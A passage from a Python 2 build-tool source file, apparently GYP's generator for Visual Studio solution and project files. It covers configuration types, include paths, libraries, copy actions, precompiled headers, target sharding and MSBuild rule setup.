shares the same path (with an appropriate suffix).
version: The VisualStudioVersion object.
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
(domain, username) = _GetDomainAndUserName()
vcuser_filename = '.'.join([proj_path, domain, username, 'user'])
user_file = MSVSUserFile.Writer(vcuser_filename, version,
spec['target_name'])
return user_file
def _GetMSVSConfigurationType(spec, build_file):
"""Returns the configuration type for this project.
It's a number defined by Microsoft. May raise an exception.
Args:
spec: The target dictionary containing the properties of the target.
build_file: The path of the gyp file.
Returns:
An integer, the configuration type.
"""
try:
config_type = {
'executable': '1', # .exe
'shared_library': '2', # .dll
'loadable_module': '2', # .dll
'static_library': '4', # .lib
'none': '10', # Utility type
'dummy_executable': '1', # .exe
}[spec['type']]
except KeyError:
if spec.get('type'):
raise Exception('Target type %s is not a valid target type for '
'target %s in %s.' %
(spec['type'], spec['target_name'], build_file))
else:
raise Exception('Missing type field for target %s in %s.' %
(spec['target_name'], build_file))
return config_type
def _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config):
"""Adds a configuration to the MSVS project.
Many settings in a vcproj file are specific to a configuration. This
function the main part of the vcproj file that's configuration specific.
Arguments:
p: The target project being generated.
spec: The target dictionary containing the properties of the target.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
config: The dictionnary that defines the special processing to be done
for this configuration.
"""
# Get the information for this configuration
include_dirs, resource_include_dirs = _GetIncludeDirs(config)
libraries = _GetLibraries(spec)
out_file, vc_tool, _ = _GetOutputFilePathAndTool(spec)
defines = _GetDefines(config)
defines = [_EscapeCppDefineForMSVS(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(config)
prebuild = config.get('msvs_prebuild')
postbuild = config.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = config.get('msvs_precompiled_header')
# Prepare the list of tools as a dictionary.
tools = dict()
# Add in user specified msvs_settings.
msvs_settings = config.get('msvs_settings', {})
MSVSSettings.ValidateMSVSSettings(msvs_settings)
for tool in msvs_settings:
settings = config['msvs_settings'][tool]
for setting in settings:
_ToolAppend(tools, tool, setting, settings[setting])
# Add the information to the appropriate tool
_ToolAppend(tools, 'VCCLCompilerTool',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(tools, 'VCResourceCompilerTool',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', libraries)
if out_file:
_ToolAppend(tools, vc_tool, 'OutputFile', out_file, only_if_unset=True)
# Add defines.
_ToolAppend(tools, 'VCCLCompilerTool', 'PreprocessorDefinitions', defines)
_ToolAppend(tools, 'VCResourceCompilerTool', 'PreprocessorDefinitions',
defines)
# Change program database directory to prevent collisions.
_ToolAppend(tools, 'VCCLCompilerTool', 'ProgramDataBaseFileName',
'$(IntDir)\\$(ProjectName)\\vc80.pdb', only_if_unset=True)
# Add disabled warnings.
_ToolAppend(tools, 'VCCLCompilerTool',
'DisableSpecificWarnings', disabled_warnings)
# Add Pre-build.
_ToolAppend(tools, 'VCPreBuildEventTool', 'CommandLine', prebuild)
# Add Post-build.
_ToolAppend(tools, 'VCPostBuildEventTool', 'CommandLine', postbuild)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(tools, 'VCCLCompilerTool', 'UsePrecompiledHeader', '2')
_ToolAppend(tools, 'VCCLCompilerTool',
'PrecompiledHeaderThrough', precompiled_header)
_ToolAppend(tools, 'VCCLCompilerTool',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(tools, 'VCLinkerTool', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(tools, 'VCLinkerTool', 'ModuleDefinitionFile', def_file)
_AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name)
def _GetIncludeDirs(config):
"""Returns the list of directories to be used for #include directives.
Arguments:
config: The dictionnary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
# TODO(bradnelson): include_dirs should really be flexible enough not to
# require this sort of thing.
include_dirs = (
config.get('include_dirs', []) +
config.get('msvs_system_include_dirs', []))
resource_include_dirs = config.get('resource_include_dirs', include_dirs)
include_dirs = _FixPaths(include_dirs)
resource_include_dirs = _FixPaths(resource_include_dirs)
return include_dirs, resource_include_dirs
def _GetLibraries(spec):
"""Returns the list of libraries for this configuration.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The list of directory paths.
"""
libraries = spec.get('libraries', [])
# Strip out -l, as it is not used on windows (but is needed so we can pass
# in libraries that are assumed to be in the default library path).
# Also remove duplicate entries, leaving only the last duplicate, while
# preserving order.
found = set()
unique_libraries_list = []
for entry in reversed(libraries):
library = re.sub('^\-l', '', entry)
if library not in found:
found.add(library)
unique_libraries_list.append(library)
unique_libraries_list.reverse()
return unique_libraries_list
def _GetOutputFilePathAndTool(spec):
"""Returns the path and tool to use for this target.
Figures out the path of the file this spec will create and the name of
the VC tool that will create it.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A triple of (file path, name of the vc tool, name of the msbuild tool)
"""
# Select a name for the output file.
out_file = ''
vc_tool = ''
msbuild_tool = ''
output_file_map = {
'executable': ('VCLinkerTool', 'Link', '$(OutDir)\\', '.exe'),
'shared_library': ('VCLinkerTool', 'Link', '$(OutDir)\\', '.dll'),
'loadable_module': ('VCLinkerTool', 'Link', '$(OutDir)\\', '.dll'),
# TODO(jeanluc) If we want to avoid the MSB8012 warnings in
# VisualStudio 2010, we will have to change the value of $(OutDir)
# to contain the \lib suffix, rather than doing it as below.
'static_library': ('VCLibrarianTool', 'Lib', '$(OutDir)\\lib\\', '.lib'),
'dummy_executable': ('VCLinkerTool', 'Link', '$(IntDir)\\', '.junk'),
}
output_file_props = output_file_map.get(spec['type'])
if output_file_props and int(spec.get('msvs_auto_output_file', 1)):
vc_tool, msbuild_tool, out_dir, suffix = output_file_props
out_dir = spec.get('product_dir', out_dir)
product_extension = spec.get('product_extension')
if product_extension:
suffix = '.' + product_extension
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
out_file = ntpath.join(out_dir, prefix + product_name + suffix)
return out_file, vc_tool, msbuild_tool
def _GetDefines(config):
"""Returns the list of preprocessor definitions for this configuation.
Arguments:
config: The dictionnary that defines the special processing to be done
for this configuration.
Returns:
The list of preprocessor definitions.
"""
defines = []
for d in config.get('defines', []):
if type(d) == list:
fd = '='.join([str(dpart) for dpart in d])
else:
fd = str(d)
defines.append(fd)
return defines
def _GetDisabledWarnings(config):
return [str(i) for i in config.get('msvs_disabled_warnings', [])]
def _GetModuleDefinition(spec):
def_file = ''
if spec['type'] in ['shared_library', 'loadable_module']:
def_files = [s for s in spec.get('sources', []) if s.endswith('.def')]
if len(def_files) == 1:
def_file = _FixPath(def_files[0])
elif def_files:
raise ValueError(
'Multiple module definition files in one target, target %s lists '
'multiple .def files: %s' % (
spec['target_name'], ' '.join(def_files)))
return def_file
def _ConvertToolsToExpectedForm(tools):
"""Convert tools to a form expected by Visual Studio.
Arguments:
tools: A dictionnary of settings; the tool name is the key.
Returns:
A list of Tool objects.
"""
tool_list = []
for tool, settings in tools.iteritems():
# Collapse settings with lists.
settings_fixed = {}
for setting, value in settings.iteritems():
if type(value) == list:
if ((tool == 'VCLinkerTool' and
setting == 'AdditionalDependencies') or
setting == 'AdditionalOptions'):
settings_fixed[setting] = ' '.join(value)
else:
settings_fixed[setting] = ';'.join(value)
else:
settings_fixed[setting] = value
# Add in this tool.
tool_list.append(MSVSProject.Tool(tool, settings_fixed))
return tool_list
def _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name):
"""Add to the project file the configuration specified by config.
Arguments:
p: The target project being generated.
spec: the target project dict.
tools: A dictionnary of settings; the tool name is the key.
config: The dictionnary that defines the special processing to be done
for this configuration.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
"""
attributes = _GetMSVSAttributes(spec, config, config_type)
# Add in this configuration.
tool_list = _ConvertToolsToExpectedForm(tools)
p.AddConfig(_ConfigFullName(config_name, config),
attrs=attributes, tools=tool_list)
def _GetMSVSAttributes(spec, config, config_type):
# Prepare configuration attributes.
prepared_attrs = {}
source_attrs = config.get('msvs_configuration_attributes', {})
for a in source_attrs:
prepared_attrs[a] = source_attrs[a]
# Add props files.
vsprops_dirs = config.get('msvs_props', [])
vsprops_dirs = _FixPaths(vsprops_dirs)
if vsprops_dirs:
prepared_attrs['InheritedPropertySheets'] = ';'.join(vsprops_dirs)
# Set configuration type.
prepared_attrs['ConfigurationType'] = config_type
output_dir = prepared_attrs.get('OutputDirectory',
'$(SolutionDir)$(ConfigurationName)')
# TODO(jeanluc) If we want to avoid the MSB8012 warning, we should
# add code like the following to place libraries in their own directory.
# if config_type == '4':
# output_dir = spec.get('product_dir', output_dir + '\\lib')
prepared_attrs['OutputDirectory'] = output_dir
if 'IntermediateDirectory' not in prepared_attrs:
intermediate = '$(ConfigurationName)\\obj\\$(ProjectName)'
prepared_attrs['IntermediateDirectory'] = intermediate
return prepared_attrs
def _AddNormalizedSources(sources_set, sources_array):
sources = [_NormalizedSource(s) for s in sources_array]
sources_set.update(set(sources))
def _PrepareListOfSources(spec, gyp_file):
"""Prepare list of sources and excluded sources.
Besides the sources specified directly in the spec, adds the gyp file so
that a change to it will cause a re-compile. Also adds appropriate sources
for actions and copies. Assumes later stage will un-exclude files which
have custom build steps attached.
Arguments:
spec: The target dictionary containing the properties of the target.
gyp_file: The name of the gyp file.
Returns:
A pair of (list of sources, list of excluded sources).
The sources will be relative to the gyp file.
"""
sources = set()
_AddNormalizedSources(sources, spec.get('sources', []))
excluded_sources = set()
# Add in the gyp file.
sources.add(gyp_file)
# Add in 'action' inputs and outputs.
for a in spec.get('actions', []):
inputs = a.get('inputs', [])
inputs = [_NormalizedSource(i) for i in inputs]
# Add all inputs to sources and excluded sources.
inputs = set(inputs)
sources.update(inputs)
excluded_sources.update(inputs)
if int(a.get('process_outputs_as_sources', False)):
_AddNormalizedSources(sources, a.get('outputs', []))
# Add in 'copies' inputs and outputs.
for cpy in spec.get('copies', []):
_AddNormalizedSources(sources, cpy.get('files', []))
return (sources, excluded_sources)
def _AdjustSourcesAndConvertToFilterHierarchy(
spec, options, gyp_dir, sources, excluded_sources):
"""Adjusts the list of sources and excluded sources.
Also converts the sets to lists.
Arguments:
spec: The target dictionary containing the properties of the target.
options: Global generator options.
gyp_dir: The path to the gyp file being processed.
sources: A set of sources to be included for this project.
excluded_sources: A set of sources to be excluded for this project.
Returns:
A trio of (list of sources, list of excluded sources,
path of excluded IDL file)
"""
# Exclude excluded sources coming into the generator.
excluded_sources.update(set(spec.get('sources_excluded', [])))
# Add excluded sources into sources for good measure.
sources.update(excluded_sources)
# Convert to proper windows form.
# NOTE: sources goes from being a set to a list here.
# NOTE: excluded_sources goes from being a set to a list here.
sources = _FixPaths(sources)
# Convert to proper windows form.
excluded_sources = _FixPaths(excluded_sources)
excluded_idl = _IdlFilesHandledNonNatively(spec, sources)
precompiled_related = _GetPrecompileRelatedFiles(spec)
# Find the excluded ones, minus the precompiled header related ones.
fully_excluded = [i for i in excluded_sources if i not in precompiled_related]
# Convert to folders and the right slashes.
sources = [i.split('\\') for i in sources]
# Remove the first N layers of hierarchy from paths that are deep enough
layers_to_remove = int(spec.get('msvs_strip_hierarchy', 2))
#print "Remove %d layers" % layers_to_remove
sources = _ConvertSourcesToFilterHierarchy(sources,
excluded=fully_excluded,
layers_to_strip=layers_to_remove)
# Add in dummy file for type none.
if spec['type'] == 'dummy_executable':
# Pull in a dummy main so it can link successfully.
dummy_relpath = gyp.common.RelativePath(
options.depth + '\\tools\\gyp\\gyp_dummy.c', gyp_dir)
sources.append(dummy_relpath)
return sources, excluded_sources, excluded_idl
def _IdlFilesHandledNonNatively(spec, sources):
# If any non-native rules use 'idl' as an extension exclude idl files.
# Gather a list here to use later.
using_idl = False
for rule in spec.get('rules', []):
if rule['extension'] == 'idl' and int(rule.get('msvs_external_rule', 0)):
using_idl = True
break
if using_idl:
excluded_idl = [i for i in sources if i.endswith('.idl')]
else:
excluded_idl = []
return excluded_idl
def _GetPrecompileRelatedFiles(spec):
# Gather a list of precompiled header related sources.
precompiled_related = []
for _, config in spec['configurations'].iteritems():
for k in precomp_keys:
f = config.get(k)
if f:
precompiled_related.append(_FixPath(f))
return precompiled_related
def _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl):
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
for file_name, excluded_configs in exclusions.iteritems():
for config_name, config in excluded_configs:
p.AddFileConfig(file_name, _ConfigFullName(config_name, config),
{'ExcludedFromBuild': 'true'})
def _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl):
exclusions = {}
# Exclude excluded sources from being built.
for f in excluded_sources:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
precomped = [_FixPath(config.get(i, '')) for i in precomp_keys]
# Don't do this for ones that are precompiled header related.
if f not in precomped:
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
# If any non-native rules use 'idl' as an extension exclude idl files.
# Exclude them now.
for f in excluded_idl:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
return exclusions
def _AddToolFilesToMSVS(p, spec):
# Add in tool files (rules).
tool_files = set()
for _, config in spec['configurations'].iteritems():
for f in config.get('msvs_tool_files', []):
tool_files.add(f)
for f in tool_files:
p.AddToolFile(f)
def _HandlePreCompiledHeaders(p, sources, spec):
# Pre-compiled header source stubs need a different compiler flag
# (generate precompiled header) and any source file not of the same
# kind (i.e. C vs. C++) as the precompiled header source stub needs
# to have use of precompiled headers disabled.
extensions_excluded_from_precompile = []
for config_name, config in spec['configurations'].iteritems():
source = config.get('msvs_precompiled_source')
if source:
source = _FixPath(source)
# UsePrecompiledHeader=1 for if using precompiled headers.
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '1'})
p.AddFileConfig(source, _ConfigFullName(config_name, config),
{}, tools=[tool])
basename, extension = os.path.splitext(source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
def DisableForSourceTree(source_tree):
for source in source_tree:
if isinstance(source, MSVSProject.Filter):
DisableForSourceTree(source.contents)
else:
basename, extension = os.path.splitext(source)
if extension in extensions_excluded_from_precompile:
for config_name, config in spec['configurations'].iteritems():
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '0',
'ForcedIncludeFiles': '$(NOINHERIT)'})
p.AddFileConfig(_FixPath(source),
_ConfigFullName(config_name, config),
{}, tools=[tool])
# Do nothing if there was no precompiled source.
if extensions_excluded_from_precompile:
DisableForSourceTree(sources)
def _AddActions(actions_to_add, spec, relative_path_of_gyp_file, conf):
# Add actions.
actions = spec.get('actions', [])
for a in actions:
cmd = _BuildCommandLineForRule(spec, a, has_input_path=False)
# Attach actions to the gyp file if nothing else is there.
inputs = a.get('inputs') or [relative_path_of_gyp_file]
# Add the action.
_AddActionStep(actions_to_add,
inputs=inputs,
outputs=a.get('outputs', []),
description=a.get('message', a['action_name']),
command=cmd,
config=conf)
def _WriteMSVSUserFile(project_path, version, spec):
# Add run_as and test targets.
if 'run_as' in spec:
run_as = spec['run_as']
action = run_as.get('action', [])
environment = run_as.get('environment', [])
working_directory = run_as.get('working_directory', '.')
elif int(spec.get('test', 0)):
action = ['$(TargetPath)', '--gtest_print_time']
environment = []
working_directory = '.'
else:
return # Nothing to add
# Write out the user file.
print "USER FILE"
user_file = _CreateMSVSUserFile(project_path, version, spec)
for config_name, c_data in spec['configurations'].iteritems():
user_file.AddDebugSettings(_ConfigFullName(config_name, c_data),
action, environment, working_directory)
user_file.WriteIfChanged()
def _AddCopies(actions_to_add, spec):
copies = _GetCopies(spec)
for inputs, outputs, cmd, description in copies:
print "!! COPY ..."
_AddActionStep(actions_to_add, inputs=inputs, outputs=outputs,
description=description, command=cmd)
def _GetCopies(spec):
copies = []
# Add copies.
for cpy in spec.get('copies', []):
for src in cpy.get('files', []):
dst = os.path.join(cpy['destination'], os.path.basename(src))
# _AddCustomBuildToolForMSVS() will call _FixPath() on the inputs and
# outputs, so do the same for our generated command line.
if src.endswith('/'):
src_bare = src[:-1]
base_dir = posixpath.split(src_bare)[0]
outer_dir = posixpath.split(src_bare)[1]
cmd = 'cd "%s" && xcopy /e /f /y "%s" "%s\\%s\\"' % (
_FixPath(base_dir), outer_dir, _FixPath(dst), outer_dir)
copies.append(([src], ['dummy_copies', dst], cmd,
'Copying %s to %s' % (src, dst)))
else:
cmd = 'mkdir "%s" 2>nul & set ERRORLEVEL=0 & copy /Y "%s" "%s"' % (
_FixPath(cpy['destination']), _FixPath(src), _FixPath(dst))
copies.append(([src], [dst], cmd, 'Copying %s to %s' % (src, dst)))
return copies
def _GetPathDict(root, path):
# |path| will eventually be empty (in the recursive calls) if it was initially
# relative; otherwise it will eventually end up as '\', 'D:\', etc.
if not path or path.endswith(os.sep):
return root
parent, folder = os.path.split(path)
parent_dict = _GetPathDict(root, parent)
if folder not in parent_dict:
parent_dict[folder] = dict()
return parent_dict[folder]
def _DictsToFolders(base_path, bucket, flat):
# Convert to folders recursively.
children = []
for folder, contents in bucket.iteritems():
if type(contents) == dict:
folder_children = _DictsToFolders(os.path.join(base_path, folder),
contents, flat)
if flat:
children += folder_children
else:
folder_children = MSVSNew.MSVSFolder(os.path.join(base_path, folder),
name='(' + folder + ')',
entries=folder_children)
children.append(folder_children)
else:
children.append(contents)
return children
def _CollapseSingles(parent, node):
# Recursively explorer the tree of dicts looking for projects which are
# the sole item in a folder which has the same name as the project. Bring
# such projects up one level.
if (type(node) == dict and
len(node) == 1 and
node.keys()[0] == parent + '.vcproj'):
return node[node.keys()[0]]
if type(node) != dict:
return node
for child in node:
node[child] = _CollapseSingles(child, node[child])
return node
def _GatherSolutionFolders(sln_projects, project_objects, flat):
root = {}
# Convert into a tree of dicts on path.
for p in sln_projects:
gyp_file, target = gyp.common.ParseQualifiedTarget(p)[0:2]
gyp_dir = os.path.dirname(gyp_file)
path_dict = _GetPathDict(root, gyp_dir)
path_dict[target + '.vcproj'] = project_objects[p]
# Walk down from the top until we hit a folder that has more than one entry.
# In practice, this strips the top-level "src/" dir from the hierarchy in
# the solution.
while len(root) == 1 and type(root[root.keys()[0]]) == dict:
root = root[root.keys()[0]]
# Collapse singles.
root = _CollapseSingles('', root)
# Merge buckets until everything is a root entry.
return _DictsToFolders('', root, flat)
def _GetPathOfProject(qualified_target, spec, options, msvs_version):
default_config = _GetDefaultConfiguration(spec)
proj_filename = default_config.get('msvs_existing_vcproj')
if not proj_filename:
proj_filename = (spec['target_name'] + options.suffix +
msvs_version.ProjectExtension())
build_file = gyp.common.BuildFile(qualified_target)
proj_path = os.path.join(os.path.split(build_file)[0], proj_filename)
fix_prefix = None
if options.generator_output:
project_dir_path = os.path.dirname(os.path.abspath(proj_path))
proj_path = os.path.join(options.generator_output, proj_path)
fix_prefix = gyp.common.RelativePath(project_dir_path,
os.path.dirname(proj_path))
return proj_path, fix_prefix
def _GetPlatformOverridesOfProject(spec):
# Prepare a dict indicating which project configurations are used for which
# solution configurations for this target.
config_platform_overrides = {}
for config_name, c in spec['configurations'].iteritems():
config_fullname = _ConfigFullName(config_name, c)
platform = c.get('msvs_target_platform', _ConfigPlatform(c))
fixed_config_fullname = '%s|%s' % (
_ConfigBaseName(config_name, _ConfigPlatform(c)), platform)
config_platform_overrides[config_fullname] = fixed_config_fullname
return config_platform_overrides
def _CreateProjectObjects(target_list, target_dicts, options, msvs_version):
"""Create a MSVSProject object for the targets found in target list.
Arguments:
target_list: the list of targets to generate project objects for.
target_dicts: the dictionary of specifications.
options: global generator options.
msvs_version: the MSVSVersion object.
Returns:
A set of created projects, keyed by target.
"""
global fixpath_prefix
# Generate each project.
projects = {}
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise Exception(
'Multiple toolsets not supported in msvs build (target %s)' %
qualified_target)
proj_path, fixpath_prefix = _GetPathOfProject(qualified_target, spec,
options, msvs_version)
guid = _GetGuidOfProject(proj_path, spec)
overrides = _GetPlatformOverridesOfProject(spec)
build_file = gyp.common.BuildFile(qualified_target)
# Create object for this project.
obj = MSVSNew.MSVSProject(
_FixPath(proj_path),
name=spec['target_name'],
guid=guid,
spec=spec,
build_file=build_file,
config_platform_overrides=overrides,
fixpath_prefix=fixpath_prefix)
projects[qualified_target] = obj
# Set all the dependencies
for project in projects.values():
deps = project.spec.get('dependencies', [])
deps = [projects[d] for d in deps]
project.set_dependencies(deps)
return projects
def CalculateVariables(default_variables, params):
"""Generated variables that require params to be known."""
generator_flags = params.get('generator_flags', {})
# Select project file format version (if unset, default to auto detecting).
msvs_version = MSVSVersion.SelectVisualStudioVersion(
generator_flags.get('msvs_version', 'auto'))
# Stash msvs_version for later (so we don't have to probe the system twice).
params['msvs_version'] = msvs_version
# Set a variable so conditions can be based on msvs_version.
default_variables['MSVS_VERSION'] = msvs_version.ShortName()
# To determine processor word size on Windows, in addition to checking
# PROCESSOR_ARCHITECTURE (which reflects the word size of the current
# process), it is also necessary to check PROCESSOR_ARCITEW6432 (which
# contains the actual word size of the system when running thru WOW64).
if (os.environ.get('PROCESSOR_ARCHITECTURE', '').find('64') >= 0 or
os.environ.get('PROCESSOR_ARCHITEW6432', '').find('64') >= 0):
default_variables['MSVS_OS_BITS'] = 64
else:
default_variables['MSVS_OS_BITS'] = 32
def _ShardName(name, number):
"""Add a shard number to the end of a target.
Arguments:
name: name of the target (foo#target)
number: shard number
Returns:
Target name with shard added (foo_1#target)
"""
parts = name.rsplit('#', 1)
parts[0] = '%s_%d' % (parts[0], number)
return '#'.join(parts)
def _ShardTargets(target_list, target_dicts):
"""Shard some targets apart to work around the linkers limits.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
Returns:
Tuple of the new sharded versions of the inputs.
"""
# Gather the targets to shard, and how many pieces.
targets_to_shard = {}
for t in target_dicts:
shards = int(target_dicts[t].get('msvs_shard', 0))
if shards:
targets_to_shard[t] = shards
# Shard target_list.
new_target_list = []
for t in target_list:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
new_target_list.append(_ShardName(t, i))
else:
new_target_list.append(t)
# Shard target_dict.
new_target_dicts = {}
for t in target_dicts:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
name = _ShardName(t, i)
new_target_dicts[name] = copy.copy(target_dicts[t])
new_target_dicts[name]['target_name'] = _ShardName(
new_target_dicts[name]['target_name'], i)
sources = new_target_dicts[name].get('sources', [])
new_sources = []
for pos in range(i, len(sources), targets_to_shard[t]):
new_sources.append(sources[pos])
new_target_dicts[name]['sources'] = new_sources
else:
new_target_dicts[t] = target_dicts[t]
# Shard dependencies.
for t in new_target_dicts:
dependencies = copy.copy(new_target_dicts[t].get('dependencies', []))
new_dependencies = []
for d in dependencies:
if d in targets_to_shard:
for i in range(targets_to_shard[d]):
new_dependencies.append(_ShardName(d, i))
else:
new_dependencies.append(d)
new_target_dicts[t]['dependencies'] = new_dependencies
return (new_target_list, new_target_dicts)
def GenerateOutput(target_list, target_dicts, data, params):
"""Generate .sln and .vcproj files.
This is the entry point for this generator.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
data: Dictionary containing per .gyp data.
"""
global fixpath_prefix
options = params['options']
# Get the project file format version back out of where we stashed it in
# GeneratorCalculatedVariables.
msvs_version = params['msvs_version']
# Optionally shard targets marked with 'msvs_shard': SHARD_COUNT.
(target_list, target_dicts) = _ShardTargets(target_list, target_dicts)
# Prepare the set of configurations.
configs = set()
for qualified_target in target_list:
spec = target_dicts[qualified_target]
for config_name, config in spec['configurations'].iteritems():
configs.add(_ConfigFullName(config_name, config))
configs = list(configs)
# Figure out all the projects that will be generated and their guids
project_objects = _CreateProjectObjects(target_list, target_dicts, options,
msvs_version)
# Generate each project.
for project in project_objects.values():
fixpath_prefix = project.fixpath_prefix
_GenerateProject(project, options, msvs_version)
fixpath_prefix = None
for build_file in data:
# Validate build_file extension
if build_file[-4:] != '.gyp':
continue
sln_path = build_file[:-4] + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
# Get projects in the solution, and their dependents.
sln_projects = gyp.common.BuildFileTargets(target_list, build_file)
sln_projects += gyp.common.DeepDependencyTargets(target_dicts, sln_projects)
# Create folder hierarchy.
root_entries = _GatherSolutionFolders(
sln_projects, project_objects, flat=msvs_version.FlatSolution())
# Create solution.
sln = MSVSNew.MSVSSolution(sln_path,
entries=root_entries,
variants=configs,
websiteProperties=False,
version=msvs_version)
sln.Write()
def _GenerateMSBuildFiltersFile(filters_path, source_files,
extension_to_rule_name):
"""Generate the filters file.
This file is used by Visual Studio to organize the presentation of source
files into folders.
Arguments:
filters_path: The path of the file to be created.
source_files: The hierarchical structure of all the sources.
extension_to_rule_name: A dictionary mapping file extensions to rules.
"""
filter_group = []
source_group = []
_AppendFiltersForMSBuild('', source_files, extension_to_rule_name,
filter_group, source_group)
if filter_group:
content = ['Project',
{'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
},
['ItemGroup'] + filter_group,
['ItemGroup'] + source_group
]
easy_xml.WriteXmlIfChanged(content, filters_path)
elif os.path.exists(filters_path):
# We don't need this filter anymore. Delete the old filter file.
os.unlink(filters_path)
def _AppendFiltersForMSBuild(parent_filter_name, sources,
extension_to_rule_name,
filter_group, source_group):
"""Creates the list of filters and sources to be added in the filter file.
Args:
parent_filter_name: The name of the filter under which the sources are
found.
sources: The hierarchy of filters and sources to process.
extension_to_rule_name: A dictionary mapping file extensions to rules.
filter_group: The list to which filter entries will be appended.
source_group: The list to which source entries will be appeneded.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
# We have a sub-filter. Create the name of that sub-filter.
if not parent_filter_name:
filter_name = source.name
else:
filter_name = '%s\\%s' % (parent_filter_name, source.name)
# Add the filter to the group.
filter_group.append(
['Filter', {'Include': filter_name},
['UniqueIdentifier', MSVSNew.MakeGuid(source.name)]])
# Recurse and add its dependents.
_AppendFiltersForMSBuild(filter_name, source.contents,
extension_to_rule_name,
filter_group, source_group)
else:
# It's a source. Create a source entry.
_, element = _MapFileToMsBuildSourceType(source, extension_to_rule_name)
source_entry = [element, {'Include': source}]
# Specify the filter it is part of, if any.
if parent_filter_name:
source_entry.append(['Filter', parent_filter_name])
source_group.append(source_entry)
def _MapFileToMsBuildSourceType(source, extension_to_rule_name):
"""Returns the group and element type of the source file.
Arguments:
source: The source file name.
extension_to_rule_name: A dictionary mapping file extensions to rules.
Returns:
A pair of (group this file should be part of, the label of element)
"""
_, ext = os.path.splitext(source)
if ext in ['.cc', '.cpp', '.c', '.cxx']:
group = 'compile'
element = 'ClCompile'
elif ext in ['.h', '.hxx']:
group = 'include'
element = 'ClInclude'
elif ext == '.rc':
group = 'resource'
element = 'ResourceCompile'
elif ext == '.idl':
group = 'midl'
element = 'Midl'
elif ext in extension_to_rule_name:
group = 'rule'
element = extension_to_rule_name[ext]
else:
group = 'none'
element = 'None'
return (group, element)
def _GenerateRulesForMSBuild(output_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name):
# MSBuild rules are implemented using three files: an XML file, a .targets
# file and a .props file.
# See http://blogs.msdn.com/b/vcblog/archive/2010/04/21/quick-help-on-vs2010-custom-build-rule.aspx
# for more details.
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
msbuild_rules = []
for rule in rules_native:
msbuild_rule = MSBuildRule(rule, spec)
msbuild_rules.append(msbuild_rule)
extension_to_rule_name[msbuild_rule.extension] = msbuild_rule.rule_name
if msbuild_rules:
base = spec['target_name'] + options.suffix
props_name = base + '.props'
targets_name = base + '.targets'
xml_name = base + '.xml'
props_files_of_rules.add(props_name)
targets_files_of_rules.add(targets_name)
props_path = os.path.join(output_dir, props_name)
targets_path = os.path.join(output_dir, targets_name)
xml_path = os.path.join(output_dir, xml_name)
_GenerateMSBuildRulePropsFile(props_path, msbuild_rules)
_GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules)
_GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules)
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(rules, sources, excluded_sources)
class MSBuildRule(object):
"""Used to store information used to generate an MSBuild rule.
Attributes:
rule_name: The rule name, sanitized to use in XML.
target_name: The name of the target.
after_targets: The name of the AfterTargets element.
before_targets: The name of the BeforeTargets element.
depends_on: The name of the DependsOn element.
compute_output: The name of the ComputeOutput element.
dirs_to_make: The name of the DirsToMake element.
tlog: The name of the _tlog element.
extension: The extension this rule applies to.
description: The message displayed when this rule is invoked.
additional_dependencies: A string listing additional dependencies.
outputs: The outputs of this rule.
command: The command used to run the rule.
"""
def __init__(self, rule, spec):
self.display_name = rule['rule_name']
# Assure that the rule name is only characters and numbers
self.rule_name = re.sub(r'\W', '_', self.display_name)
# Create the various element names, following the example set by the
# Visual Studio 2008 to 2010 conversion. I don't know if VS2010
# is sensitive to the exact names.
self.target_name = '_' + self.rule_name
self.after_targets = self.rule_name + 'AfterTargets'
self.before_targets = self.rule_name + 'BeforeTargets'
